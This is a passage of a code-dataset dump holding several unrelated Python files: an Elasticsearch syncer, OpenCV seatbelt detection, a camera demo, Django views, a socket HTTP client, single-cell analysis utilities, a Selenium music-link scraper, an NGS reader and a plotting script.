the database tables are in sync with Elasticsearch. If not,\n begin replication.\n \"\"\"\n pg_conn = database_connect()\n\n for table in self.tables_to_watch:\n pg_conn.set_session(readonly=True)\n cur = pg_conn.cursor()\n # Find the last row added to the database table\n cur.execute(SQL('SELECT id FROM {} ORDER BY id DESC LIMIT 1;')\n .format(Identifier(table)))\n last_added_pg_id = cur.fetchone()[0]\n pg_conn.commit()\n cur.close()\n if not last_added_pg_id:\n log.warning('Tried to sync ' + table + ' but it was empty.')\n continue\n\n # Find the last document inserted into elasticsearch\n s = Search(using=self.es, index=table)\n s.aggs.bucket('highest_pg_id', 'max', field='id')\n try:\n es_res = s.execute()\n last_added_es_id = \\\n int(es_res.aggregations['highest_pg_id']['value'])\n except (TypeError, NotFoundError):\n log.info('No matching documents found in elasticsearch. 
'\n 'Replicating everything.')\n last_added_es_id = 0\n log.info('highest_db_id, highest_es_id: ' + str(last_added_pg_id) +\n ', ' + str(last_added_es_id))\n # Select all documents in-between and replicate to Elasticsearch.\n if last_added_pg_id > last_added_es_id:\n log.info('Replicating range ' + str(last_added_es_id) + '-' +\n str(last_added_pg_id))\n self._replicate(last_added_es_id, last_added_pg_id, table)\n pg_conn.close()\n\n def _replicate(self, start, end, table):\n \"\"\"\n Replicate all of the records between `start` and `end`.\n\n :param start: The first ID to replicate\n :param end: The last ID to replicate\n :param table: The table to replicate this range from.\n :return:\n \"\"\"\n cursor_name = table + '_table_cursor'\n # Enable writing to Postgres so we can create a server-side cursor.\n pg_conn = database_connect()\n with pg_conn.cursor(name=cursor_name) as server_cur:\n server_cur.itersize = DB_BUFFER_SIZE\n select_range = SQL(\n 'SELECT * FROM {}'\n ' WHERE id BETWEEN %s AND %s ORDER BY id')\\\n .format(Identifier(table))\n server_cur.execute(select_range, (start, end,))\n num_converted_documents = 0\n # Fetch a chunk and push it to Elasticsearch. Repeat until we run\n # out of chunks.\n while True:\n chunk = server_cur.fetchmany(server_cur.itersize)\n if not chunk:\n break\n es_batch = self.pg_chunk_to_es(chunk, server_cur.description,\n table)\n push_start_time = time.time()\n log.info('Pushing ' + str(len(es_batch)) +\n ' docs to Elasticsearch.')\n # Bulk upload to Elasticsearch in parallel.\n list(helpers.parallel_bulk(self.es, es_batch, chunk_size=400))\n\n log.info('Pushed in ' + str(time.time() - push_start_time) +\n 's.')\n num_converted_documents += len(chunk)\n log.info('Synchronized ' + str(num_converted_documents) + ' from '\n 'table \\'' + table + '\\' to Elasticsearch')\n pg_conn.commit()\n pg_conn.close()\n\n def listen(self, poll_interval=10):\n \"\"\"\n Poll the database for changes every poll_interval seconds.\n\n :arg poll_interval: The number of seconds to wait before polling the\n database for changes.\n \"\"\"\n while True:\n log.info('Listening for updates...')\n try:\n self._synchronize()\n except ElasticsearchConnectionError:\n self.es = elasticsearch_connect()\n\n time.sleep(poll_interval)\n\n @staticmethod\n def pg_chunk_to_es(pg_chunk, columns, origin_table):\n \"\"\"\n Given a list of psycopg2 results, convert them all to Elasticsearch\n documents.\n \"\"\"\n # Map column names to locations in the row tuple\n schema = {col[0]: idx for idx, col in enumerate(columns)}\n try:\n model = database_table_to_elasticsearch_model[origin_table]\n except KeyError:\n log.error(\n 'Table ' + origin_table +\n ' is not defined in elasticsearch_models.')\n return []\n\n documents = []\n for row in pg_chunk:\n converted = model.database_row_to_elasticsearch_doc(row, schema)\n converted = converted.to_dict(include_meta=True)\n documents.append(converted)\n\n return documents\n\n\ndef elasticsearch_connect(timeout=300):\n \"\"\"\n Repeatedly try to connect to Elasticsearch until successful.\n :return: An Elasticsearch connection object.\n \"\"\"\n while True:\n try:\n return _elasticsearch_connect(timeout)\n except ElasticsearchConnectionError as e:\n log.exception(e)\n log.error('Reconnecting to Elasticsearch in 5 seconds. . .')\n time.sleep(5)\n continue\n\n\ndef _elasticsearch_connect(timeout=300):\n \"\"\"\n Connect to configured Elasticsearch domain.\n\n :param timeout: How long to wait before ANY request to Elasticsearch times\n out. 
Because we use parallel bulk uploads (which sometimes wait long periods\n of time before beginning execution), a value of at least 30 seconds is\n recommended.\n :return: An Elasticsearch connection object.\n \"\"\"\n try:\n log.info('Trying to connect to Elasticsearch without authentication...')\n # Try to connect to Elasticsearch without credentials.\n es = Elasticsearch(\n host=ELASTICSEARCH_URL,\n port=ELASTICSEARCH_PORT,\n connection_class=RequestsHttpConnection,\n timeout=timeout,\n max_retries=10,\n wait_for_status='yellow'\n )\n log.info(str(es.info()))\n log.info('Connected to Elasticsearch without authentication.')\n except (AuthenticationException, AuthorizationException):\n # If that fails, supply AWS authentication object and try again.\n log.info(\n 'Connecting to %s %s with AWS auth', ELASTICSEARCH_URL,\n ELASTICSEARCH_PORT)\n auth = AWSRequestsAuth(\n aws_access_key=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY,\n aws_host=ELASTICSEARCH_URL,\n aws_region=AWS_REGION,\n aws_service='es'\n )\n auth.encode = lambda x: bytes(x.encode('utf-8'))\n es = Elasticsearch(\n host=ELASTICSEARCH_URL,\n port=ELASTICSEARCH_PORT,\n connection_class=RequestsHttpConnection,\n timeout=timeout,\n max_retries=10,\n retry_on_timeout=True,\n http_auth=auth,\n wait_for_status='yellow'\n )\n es.info()\n return es\n\n\ndef database_connect():\n \"\"\"\n Repeatedly try to connect to database until successful.\n :return: A database connection object\n \"\"\"\n while True:\n try:\n conn = psycopg2.connect(\n dbname=DATABASE_NAME,\n user=DATABASE_USER,\n password=DATABASE_PASSWORD,\n host=DATABASE_HOST,\n port=DATABASE_PORT,\n connect_timeout=5\n )\n except psycopg2.OperationalError as e:\n log.exception(e)\n log.error('Reconnecting to database in 5 seconds. . 
.')\n time.sleep(5)\n continue\n break\n\n return conn\n\n\nif __name__ == '__main__':\n fmt = \"%(asctime)s %(message)s\"\n log.basicConfig(stream=sys.stdout, level=log.INFO, format=fmt)\n log.getLogger(ElasticsearchSyncer.__name__).setLevel(log.DEBUG)\n log.info('Connecting to database')\n # Use readonly and autocommit to prevent polling from locking tables.\n log.info('Connecting to Elasticsearch')\n elasticsearch = elasticsearch_connect()\n syncer = ElasticsearchSyncer(elasticsearch, replicate_tables)\n log.info('Beginning synchronizer')\n syncer.listen(SYNCER_POLL_INTERVAL)\n","sub_path":"es_syncer/es_syncer/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":11074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114160180","text":"import cv2\nimport os\nimport time\nimport numpy as np\nfrom imutils import face_utils\nimport imutils\n\n\ndef Gabor(frame):\n return cv2.filter2D(frame, cv2.CV_8UC3, cv2.getGaborKernel((25, 25), 0.1, 1 * np.pi / 2, 9.0, 0.6, 25, ktype=cv2.CV_32F))\n\ndef Clahe(frame):\n a = cv2.split(cv2.cvtColor(frame, cv2.COLOR_BGR2LAB))\n clahe = cv2.createCLAHE(clipLimit=4.5, tileGridSize=(7, 7))\n a[0] = clahe.apply(a[0])\n return cv2.cvtColor(cv2.merge(a), cv2.COLOR_LAB2BGR)\n\ndef main():\n \n net =cv2.dnn.readNet(\"YOLOFI2.weights\",\"YOLOFI.cfg\")\n cap = cv2.VideoCapture(\"test.mp4\")\n classes=[] \n l=1\n with open(\"obj.names\",\"r\")as f:\n classes = [line.strip()for line in f.readlines()]\n layers_names = net.getLayerNames()\n outputlayers= [layers_names[i[0]-1]for i in net.getUnconnectedOutLayers()]\n colors = np.random.uniform(0,255,size =(len(classes),3))\n font = cv2.FONT_HERSHEY_PLAIN\n frame_id=0 \n dd =-1\n time_now=time.time()\n frame_id=0\n err=0\n\n count = 0 # for counting frames\n\n while True:\n _, frame = cap.read()\n frame_id += 1 \n beltcornerdetected = False\n beltdetected = False \n height , width , channels = frame.shape\n\n\n frame = Gabor(frame)\n\n frame = Clahe(frame)\n #I'm using Gabor and Clache, because this is best solutions.\n\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (480,480),(0,0,0),True,crop= False)\n net.setInput(blob)\n outs = net.forward(outputlayers)\n class_ids=[]\n boxes=[]\n shape=[]\n confidence=0\n\n for out in outs:\n\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n \n if confidence> 0.2:\n center_x= int(detection[0] *width)\n center_y=int(detection[1]* height)\n w= int(detection[2] *width)\n h= int(detection[3] * height)\n x= int(center_x- w /2)\n y= int(center_y -h /2)\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)\n if class_id== 1:\n beltcornerdetected=True\n elif class_id == 0:\n beltdetected=True\n \n print(count, ' ', beltdetected)\n count+=1\n cv2.imshow(\"Image\",frame)\n key =cv2.waitKey(1)\n if key == 27:\n break\n \n cap.release() \n cv2.destroyAllWindows()\n \nif __name__ == '__main__':\n main()\n","sub_path":"BeltDetectionLab2/BeltDetectionLab2.py","file_name":"BeltDetectionLab2.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"117058819","text":"# -*- coding: utf-8 -*-\n\nfrom PyIMAQ import *\nimport numpy as np\nimport multiprocessing as mp\nfrom threading import Thread\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport time\nmatplotlib.use('TkAgg')\n\n# -----------------------------------------------------------------------------\n\ncamera_name = 
\"img0\"\nbuffer_size = 24\n\n# -----------------------------------------------------------------------------\n\nprint(\"Frame grab demo from camera\",camera_name,\"...\")\n\n# Open the camera interface\nprint(\"imgOpen\")\nimgShowErrorMsg(imgOpen('img0'))\n\n\n# Initialize a ring buffer w/ [buffer_size] buffers\nprint(\"imgInitBuffers... \",buffer_size,\"buffers in ring...\")\nimgShowErrorMsg(imgInitBuffer(buffer_size))\n\n# Start camera acquisition\nprint(\"imgStartAcq\")\nimgShowErrorMsg(imgStartAcq())\n\ntime.sleep(5)\n\nprint(imgGetBufferSize(),\"bytes/frame...\")\n\nfqueue = mp.Queue(buffer_size)\n\nplt.figure(1)\nplt.ion()\nline, = plt.plot([])\nplt.xlim([0, 2048])\nplt.ylim([0, 200])\nplt.show()\n\nwhile True:\n \n start = time.time()\n \n fbuff = np.empty(imgGetFrameSize(),dtype=np.uint16)\n \n imgGetCurrentFrame(fbuff,np.empty(1,dtype=np.int))\n \n f = fbuff[2048*100:2048*101]\n del fbuff \n print(str(1000 / (time.time() - start))[0:6],\"hz\")\n print(imgGetDroppedFrames(),\"dropped frames\")\n \n plt.pause(0.001)\n line.set_ydata(f)\n line.set_xdata(range(len(f)))\n \n plt.draw() \n\nplt.close()\n\nprint(\"imgAbortAcq\")\nimgShowErrorMsg(imgAbortAcq())\n\nprint(\"imgClose\")\nimgShowErrorMsg(imgClose())\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"457108900","text":"from django.shortcuts import render\nfrom django.views.generic.list import ListView\n\nfrom lrapp.rango.models import Category, Page\nfrom lrapp.account.decorators import add_fav_to_dict\n\n\n@add_fav_to_dict\ndef index(request, **kwargs):\n category_list = Category.objects.order_by('-likes')[:8]\n page_list = Page.objects.order_by('-likes')[:8]\n kwargs['categories'] = category_list\n kwargs['pages'] = page_list\n return render(request, 'topic/index.html', kwargs)\n\n\ndef about(request):\n return render(request, 'topic/about.html')\n\n\ndef get_category_list(max_results=0, starts_with=''):\n category_list = []\n if starts_with:\n category_list = Category.objects.filter(name__istartswith=starts_with)\n if category_list and max_results > 0:\n if category_list.count > max_results:\n category_list = category_list[:max_results]\n return category_list\n\n\ndef suggest_category(request):\n starts_with = ''\n if request.method == 'GET':\n starts_with = request.GET['suggestion']\n category_list = get_category_list(8, starts_with)\n return render(request, 'cats.html', {'categories': category_list})\n\n\nclass CategoryList(ListView):\n model = Category\n context_object_name = 'categories'\n template_name = 'topic/all_categories.html'\n paginate_by = 3\n\n def get_queryset(self):\n try:\n a = self.request.GET.get('category',)\n except KeyError:\n a = None\n\n if a:\n category_list = Category.objects.filter(name__icontains=a)\n else:\n category_list = Category.objects.all()\n\n return category_list\n\n\nclass PageList(ListView):\n model = Page\n paginate_by = 3\n template_name = 'topic/all_pages.html'\n context_object_name = 'pages'\n\n def get_queryset(self):\n try:\n a = self.request.GET.get('page_title',)\n except KeyError:\n a = None\n if a:\n page_list = Page.objects.filter(title__icontains=a)\n else:\n page_list = Page.objects.all()\n return page_list\n\n","sub_path":"lrapp/topic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
+{"seq_id":"423291212","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport shelve\nimport threading\n\nfrom core import Checkip, HSM, Certificate, Subsystem, MFPInst\n\nclass Daemonize_it(threading.Thread):\n def __init__(self, item):\n threading.Thread.__init__(self)\n self.item = item\n\n def run(self):\n self.item.monitor()\n\n\nclass Host(object):\n def __init__(self):\n super(Host, self).__init__()\n\n self._attrs = [\n 'checkip',\n 'hsm',\n 'certificate',\n 'subsystem',\n 'mfp']\n\n def __getattr__(self, app):\n if self.__dict__ == {}:\n return super(Host, self).__getattr__(app)\n if app in self._attrs:\n if app == 'checkip':\n value = [item for item in Checkip()]\n elif app == 'hsm':\n value = [item for item in HSM()]\n elif app == 'certificate':\n value = [item for item in Certificate()]\n elif app == 'subsystem':\n value = [item for item in Subsystem()]\n elif app == 'mfp':\n value = [item for item in MFPInst()]\n else:\n return super(Host, self).__getattr__(app)\n\n setattr(self, app, value)\n return value\n else:\n raise AttributeError('%s is not defined' % app)\n\n def run_forever(self, once=False):\n apps = [\n 'checkip',\n 'hsm',\n 'certificate',\n 'subsystem',\n 'mfp' ]\n\n for app in apps:\n for item in getattr(self, app):\n Daemonize_it(item).start()\n\n\nif __name__ == '__main__':\n host = Host()\n host.run_forever()\n","sub_path":"swiftsystem/monitor_server.py","file_name":"monitor_server.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405836110","text":"#import socket module\nfrom socket import *\nimport sys # In order to terminate the program\n\nc = socket(AF_INET, SOCK_STREAM)\nc.connect((sys.argv[1], int(sys.argv[2])))\nc.send((\"GET /\" + sys.argv[3] + \" HTTP/1.1\\r\\n\\r\\n\").encode())\nd = c.recv(1024)\nout = \"\"\nwhile d:\n out += d.decode()\n d = c.recv(1024)\n \nprint(out)\nc.close()\n","sub_path":"a1/test/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591238186","text":"import matplotlib.pyplot as plt \nimport numpy as np\nfrom torch_geometric.data import Data\nimport torch \nfrom sklearn.metrics import mean_squared_error\nimport scvelo as scv \nimport scanpy as sc\nimport anndata\nfrom scipy.sparse import csr_matrix\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, Normalizer\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.neighbors import kneighbors_graph\nfrom backbone import nearest_neighbor\n\ndef process_adata(adata, noise=0.0):\n\n scv.pp.filter_and_normalize(adata, flavor = 'cell_ranger', min_shared_counts=0, n_top_genes=300, log=True)\n if adata.n_vars > 299:\n adata = adata[:,:299]\n elif adata.n_vars < 299:\n raise ValueError(\"Feature number\", adata.n_vars)\n\n print(adata.X.shape)\n\n scv.pp.moments(adata, n_pcs=30, n_neighbors=30)\n scv.tl.velocity(adata, mode='stochastic') \n\n adata2 = adata.copy()\n # dpt\n adata.uns['iroot'] = 0\n sc.tl.diffmap(adata)\n sc.tl.dpt(adata)\n #velo-dpt\n scv.tl.velocity_graph(adata2)\n scv.tl.velocity_pseudotime(adata2)\n y_dpt = adata.obs['dpt_pseudotime'].to_numpy()\n y_vdpt = adata2.obs['velocity_pseudotime'].to_numpy()\n\n X_spliced = adata.X.toarray()\n\n pipeline = Pipeline([('pca', PCA(n_components=30, svd_solver='arpack'))])\n X_pca = pipeline.fit_transform(X_spliced)\n\n conn, G = nearest_neighbor(X_pca, 
k=10, sigma=3)\n\n    # X_spliced is original, X_pca is after pca\n    x = X_spliced.copy()\n    x = StandardScaler().fit_transform(x)\n    x = torch.FloatTensor(x.copy())\n\n    # X_pca_pre is after pca\n    # v = StandardScaler().fit_transform(X_pre)\n    # v = torch.FloatTensor(v)\n\n    # Simulation time label\n    y = adata.obs['sim_time'].to_numpy().reshape((-1, 1))\n    scaler = MinMaxScaler((0, 1))\n    scaler.fit(y)\n    y = torch.FloatTensor(scaler.transform(y).reshape(-1, 1))\n\n    # Graph type label\n    # y = torch.LongTensor(np.where(np.array(backbones) == bb)[0])\n\n    edge_index = np.array(np.nonzero(conn))\n    edge_index = torch.LongTensor(edge_index)\n\n    adj = conn.copy()\n\n    data = Data(x=x, edge_index=edge_index, y=y, adj=adj, y_dpt = y_dpt, y_vdpt = y_vdpt, noise=noise)\n    print(x.shape)\n    return data\n\ndef process_adata_novelo(adata, noise=0.0):\n    sc.pp.filter_genes(adata, min_counts = 0)\n    sc.pp.normalize_per_cell(adata)\n    sc.pp.filter_genes_dispersion(adata, n_top_genes= 300)\n    sc.pp.log1p(adata)\n    if adata.n_vars > 299:\n        adata = adata[:,:299]\n    elif adata.n_vars < 299:\n        raise ValueError(\"Feature number\", adata.n_vars)\n\n    print(adata.X.shape)\n\n    X_spliced = adata.X.toarray()\n\n    pipeline = Pipeline([('pca', PCA(n_components=30, svd_solver='arpack'))])\n    X_pca = pipeline.fit_transform(X_spliced)\n\n    conn, G = nearest_neighbor(X_pca, k=10, sigma=3)\n\n    # X_spliced is original, X_pca is after pca\n    x = X_spliced.copy()\n    x = StandardScaler().fit_transform(x)\n    x = torch.FloatTensor(x)\n\n    # Simulation time label\n    y = adata.obs['sim_time'].to_numpy().reshape((-1, 1))\n    scaler = MinMaxScaler((0, 1))\n    scaler.fit(y)\n    y = torch.FloatTensor(scaler.transform(y).reshape(-1, 1))\n\n    # Graph type label\n    # y = torch.LongTensor(np.where(np.array(backbones) == bb)[0])\n\n    edge_index = np.array(np.nonzero(conn))\n    edge_index = torch.LongTensor(edge_index)\n\n    adj = conn.copy()\n\n    data = Data(x=x, edge_index=edge_index, y=y, adj=adj, noise=noise)\n    print(x.shape)\n    return data\n\ndef technological_noise(count_mt, capture_rate = 0.2):\n    \n    X = count_mt.astype('int')\n    libsize_cell = [np.sum(X[cell,:]) for cell in range(X.shape[0])]\n\n    gene_indices = [[0 for gene in range(libsize_cell[cell])] for cell in range(X.shape[0])]\n    sampled_genes = []\n    \n    for cell_id, gene_idx in enumerate(gene_indices):\n        # one Bernoulli capture event per molecule in this cell (its library size)\n        subsample = np.random.uniform(0.0, 1.0, size = len(gene_idx)) > (1-capture_rate)\n        sampled_genes.append(subsample)\n        idx = 0\n        for gene_id, gene_num in enumerate(X[cell_id,:]):\n            count = np.sum(subsample[idx:(idx + int(gene_num))])\n            X[cell_id, gene_id] = count\n            idx += int(gene_num)  # advance the molecule pointer past this gene\n    \n    return X\n\ndef calculate_adj(conn, x, v):\n    adj = np.full_like(conn, np.nan)\n    for i in range(conn.shape[0]):\n        # self loop\n        adj[i][i] = 0\n\n        indices = conn[i,:].nonzero()[0]\n        for k in indices:\n            diff = x[i, :] - x[k, :] # 1,d\n            distance = np.linalg.norm(diff, ord=2) #1\n            # penalty = np.dot(diff, velo_matrix[k, :, None]) / np.linalg.norm(velo_matrix[k,:], ord=2) / distance\n            penalty = np.dot(diff, v[k, :, None]) / np.linalg.norm(v[k,:], ord=2) / distance\n            penalty = 0 if np.isnan(penalty) else penalty\n            adj[i][k] = penalty\n    return adj\n\ndef pca_op(X, n_comps = 2, standardize = True):\n    \"\"\"\\\n    Calculate the PCA\n    \"\"\"\n    from sklearn.preprocessing import StandardScaler\n    from sklearn.pipeline import Pipeline\n    from sklearn.decomposition import PCA\n    if standardize:\n        pipeline = Pipeline([('standardize', StandardScaler()), ('pca', PCA(n_components=n_comps))])\n    else:\n        pipeline = Pipeline([('pca', PCA(n_components=n_comps))])\n    X_pca = 
pipeline.fit_transform(X)\n    return X_pca\n\ndef umap_op(X, n_comps = 2):\n    \"\"\"\\\n    Calculate the umap\n    \"\"\"\n    from umap import UMAP\n    Umap = UMAP(n_components=n_comps)\n    X_umap = Umap.fit_transform(X)\n    return X_umap\n\ndef kendalltau(y_pred, y_label):\n    from scipy.stats import kendalltau\n    if isinstance(y_label, torch.Tensor):\n        y_label = y_label.numpy().squeeze()\n    else:\n        y_label = y_label.squeeze()\n    if isinstance(y_pred, torch.Tensor):\n        y_pred = y_pred.numpy().squeeze()\n    else:\n        y_pred = y_pred.squeeze()\n    tau, p_val = kendalltau(y_pred, y_label)\n    return tau\n\ndef pearson(y_pred, y_label):\n    if isinstance(y_label, torch.Tensor):\n        y_label = y_label.numpy().squeeze()\n    else:\n        y_label = y_label.squeeze()\n    if isinstance(y_pred, torch.Tensor):\n        y_pred = y_pred.numpy().squeeze()\n    else:\n        y_pred = y_pred.squeeze()\n\n    vx = y_pred - np.mean(y_pred)\n    vy = y_label - np.mean(y_label)\n    score = np.sum(vx * vy) / (np.sqrt(np.sum(vx ** 2)) * np.sqrt(np.sum(vy ** 2)))\n    return score\n\ndef scatter(model, data, figsize = (15,5), method = 'pca', coloring = \"order\", metric = \"kendall_tau\", knn=False, device=torch.device('cuda' if torch.cuda.is_available() else 'cpu')):\n    model.eval()\n    # X should be something before pca\n    if isinstance(data.x, torch.Tensor):\n        X = data.x.numpy()\n    elif isinstance(data.x, np.ndarray):\n        X = data.x\n    else:\n        raise ValueError('tensor or numpy array')\n    \n    if isinstance(data.y, torch.Tensor):\n        y = data.y.numpy().squeeze()\n    elif isinstance(data.y, np.ndarray):\n        y = data.y\n    else:\n        raise ValueError('tensor or numpy array')\n    if method == 'pca':\n        X_pca = pca_op(X, n_comps = 2, standardize=False)\n    elif method == 'umap':\n        X_pca = umap_op(X, n_comps = 2)\n    else:\n        raise ValueError(\"either pca or umap\")\n    \n    data = data.to(device)\n    pred,_,_ = model(data)\n\n    pred = pred.detach().cpu().numpy().reshape(-1)\n\n    if knn: \n        fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(30, 10))\n        ax3.set_title('knn')\n    else:\n        fig, (ax1, ax2) = plt.subplots(1, 2, figsize=figsize)\n\n    if metric == \"kendall_tau\":\n        loss = kendalltau(pred, y)\n        ax1.set_title(\"Prediction, kendalltau=\"+str(loss)[:5] + \" data noise=\"+str(data.noise[0]))\n    elif metric == \"pearson\":\n        loss = pearson(pred, y)\n        ax1.set_title(\"Prediction, pearson=\"+str(loss)[:5] + \" data noise=\"+str(data.noise[0]))\n\n    else:\n        loss = mean_squared_error(y, pred)\n        ax1.set_title(\"Prediction, rmse=\"+str(loss)[:5])\n\n    ax2.set_title(\"Ground Truth\")\n\n    if coloring == \"order\":\n        y_sorted = sorted(y)\n        y = [y_sorted.index(i) for i in y]\n\n        pred_sorted = sorted(pred)\n        pred = [pred_sorted.index(i) for i in pred]\n\n    v1 = ax1.scatter(X_pca[:,0],X_pca[:,1], cmap = 'gnuplot', c=pred)\n    fig.colorbar(v1, fraction=0.046, pad=0.04, ax = ax1)\n\n    v2 = ax2.scatter(X_pca[:,0],X_pca[:,1], cmap = 'gnuplot', c=y)\n    fig.colorbar(v2, fraction=0.046, pad=0.04, ax = ax2)  # colorbar for the ground-truth scatter\n\n    if knn:\n        edges = data.edge_index.cpu().numpy()\n        for i in range(edges.shape[1]):\n            ax3.plot(X_pca[edges[:,i]][:,0], X_pca[edges[:,i]][:,1])\n    plt.show()","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"314007967","text":"import time,re\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport pandas as pd\n\ndef spider(artist):\n    driver = webdriver.Chrome()\n    driver.implicitly_wait(5)\n    driver.get(\"http://tool.liumingye.cn/music/?page=searchPage\")\n\n    input_tag = 
driver.find_element_by_id('input')\n    input_tag.send_keys('周杰伦')\n    input_tag.send_keys(Keys.ENTER)\n\n    download_icons = driver.find_elements_by_class_name('init')\n    for item in download_icons:\n        # Attention: a class name containing spaces breaks find_element_by_class_name; a CSS selector handles it\n        downloader_icon = item.find_element_by_css_selector(\"[class='aplayer-list-download iconfont icon-xiazai']\")\n        downloader_icon.click()\n    links = driver.find_elements_by_css_selector(\"[class='btn btn-outline-secondary download']\")\n\n    # After parsing the download links, close the dialog and go back one level so the traversal can continue\n    for link in links:\n\n        print(link.get_attribute('outerHTML'))\n\n\n    time.sleep(2)\n    driver.quit()\n\n\n#spider(' ')\n\n\n\n# token_m=re.compile('resourceType=')\n# musical_urls=[['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=LQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=2&channel=0'], ['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=PQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=2&channel=0'], ['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=HQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=2&channel=0'], ['http://218.205.239.34/MIGUM2.0/v1.0/content/sub/listenSong.do?toneFlag=SQ&netType=00&copyrightId=0&contentId=600907000009041441&resourceType=E&channel=0'], [], [], []]\n# musical_urls=list(filter(None,musical_urls))\n# musical_urls=[musical_url[0] for musical_url in musical_urls]\n#\n# for url in musical_urls:\n#     type_pos=token_m.search(url).span()[1]\n#     type=url[type_pos:type_pos+1]\n#\n#\n#\n#     print(type)\n\ndownload_df = pd.DataFrame(columns=['Artist', 'Music_name', 'Quality', 'Url'])\na=['a']*4\ndownload_df['Artist']=a\nprint(download_df)","sub_path":"Reference.py","file_name":"Reference.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385726454","text":"import os\nfrom typing import Optional, Sequence\n\nfrom csr.tabular_file_reader import TabularFileReader\nfrom sources2csr.ngs import NGS, LibraryStrategy\nfrom sources2csr.ngs_reader import NgsReader, ReaderException\n\n\nclass NgsTxtReader(NgsReader):\n    \"\"\" Reads .txt files with Continuous CNA per gene and Discrete CNA per gene data.\n    \"\"\"\n\n    def __init__(self, input_dir: str):\n        super().__init__(input_dir, LibraryStrategy.CNV)\n\n    def read_data(self, filename: str) -> Optional[Sequence[NGS]]:\n        \"\"\" Reads .txt file.\n        Sample_id should be specified in the header. Assumes that the IDs will start with 'PMC'.\n\n        :param filename: name of the input file\n        :return: Sequence of NGS objects\n        \"\"\"\n        data = TabularFileReader(os.path.join(self.input_dir, filename)).read_data()\n        biosource_biomaterial_dict = dict()\n        if data:\n            sample_id_col_num = 0\n            for col_value in data[0]:\n                if col_value.startswith('PMC'):\n                    sample_id_col_num += 1\n                    biosource_biomaterial = self.biosource_biomaterial_from_sample_id(col_value, filename)\n                    biosource_biomaterial_dict.setdefault(biosource_biomaterial[0], []).append(biosource_biomaterial[1])\n            if sample_id_col_num == 0:\n                raise ReaderException(\"Cannot read NGS data from file: {}. No sample_id found in header\"\n                                      .format(filename))\n        else:\n            raise ReaderException(\"Cannot read NGS data from file: {}. 
Empty data.\".format(filename))\n return self.map_ngs(biosource_biomaterial_dict, filename)\n","sub_path":"sources2csr/ngs_txt_reader.py","file_name":"ngs_txt_reader.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"108159320","text":"import matplotlib.pyplot as plt\nimport os\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom functools import partial\nfrom collections import namedtuple, OrderedDict\nfrom typing import Any, Dict, List, Optional\n\nfrom adaptiveleak.utils.constants import POLICIES, ENCODING\nfrom adaptiveleak.utils.file_utils import read_json_gz\nfrom adaptiveleak.analysis.plot_utils import COLORS, to_label, geometric_mean, MARKER, MARKER_SIZE, LINE_WIDTH, PLOT_STYLE\nfrom adaptiveleak.analysis.plot_utils import PLOT_SIZE, AXIS_FONT, LEGEND_FONT, TITLE_FONT\nfrom adaptiveleak.analysis.plot_utils import extract_results, iterate_policy_folders, dataset_label, get_multiplier\n\n\ndef plot(sim_results: Dict[str, Dict[float, float]], dataset_name: str, output_file: Optional[str], is_group_comp: bool, metric: str, include_skip_rnn: bool):\n\n with plt.style.context(PLOT_STYLE):\n fig, ax = plt.subplots(figsize=(PLOT_SIZE[0], PLOT_SIZE[1] * 0.75))\n\n labels: List[str] = []\n agg_errors: List[float] = []\n\n policy_names = ['adaptive_heuristic', 'adaptive_deviation'] if is_group_comp else POLICIES\n\n if not include_skip_rnn:\n policy_names = list(filter(lambda t: not t.startswith('skip_rnn'), policy_names))\n\n encoding_names = ['single_group', 'group_unshifted', 'pruned', 'group'] if is_group_comp else ['standard', 'padded', 'group']\n\n for name in policy_names:\n encodings = encoding_names if name not in ('uniform', 'random') else ['standard']\n\n for encoding in encodings:\n\n policy_name = '{0}_{1}'.format(name, encoding)\n\n if (policy_name not in sim_results) and (name not in sim_results):\n continue\n\n if name in sim_results:\n policy_name = name\n\n model_results = sim_results[policy_name]\n energy_per_seq = list(sorted(model_results.keys()))\n errors = [model_results[e] for e in energy_per_seq]\n\n if name != 'random' and encoding != 'padded':\n ax.plot(energy_per_seq, errors, marker=MARKER, linewidth=LINE_WIDTH, markersize=MARKER_SIZE, label=to_label(policy_name), 